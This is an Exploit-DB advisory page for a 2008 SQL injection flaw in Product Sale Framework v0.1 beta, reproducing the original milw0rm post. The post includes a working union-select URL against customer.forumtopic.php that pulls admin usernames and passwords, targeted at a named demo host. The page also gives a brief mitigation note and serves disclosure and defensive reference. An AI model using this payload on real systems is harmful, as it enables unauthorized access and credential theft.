Product Sale Framework sql injection Vulnerability

vendor:

Product Sale Framework

by:

b3hz4d

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Product Sale Framework

Affected Version From: v0.1 beta

Affected Version To: v0.1 beta

Patch Exists: NO

Related CWE: N/A

CPE: a:product_sale_framework:product_sale_framework:0.1beta

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Product Sale Framework sql injection Vulnerability

A vulnerability exists in Product Sale Framework v0.1 beta, where an attacker can inject malicious SQL queries into the customer.forumtopic.php page, allowing them to gain access to the admin username and password.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

        +++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
        +                                                                    +
        +         Product Sale Framework sql injection Vulnerability         +
        +                                                                    +
        +                      Discovered by b3hz4d                          +
        +                                                                    +
        +                      WwW.DeltaHacking.Net                          +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 06 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR        : http://www.productsaleframework.com
DEMO (links)  : http://www.productsaleframework.com

#####################################################


[+] vuln    : 
              customer.forumtopic.php
              
              vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:
             
              http://www.productsaleframework.com/

[+] Exploit : 
              Admin Username and Password:

              http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
    
               
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# milw0rm.com [2008-12-07]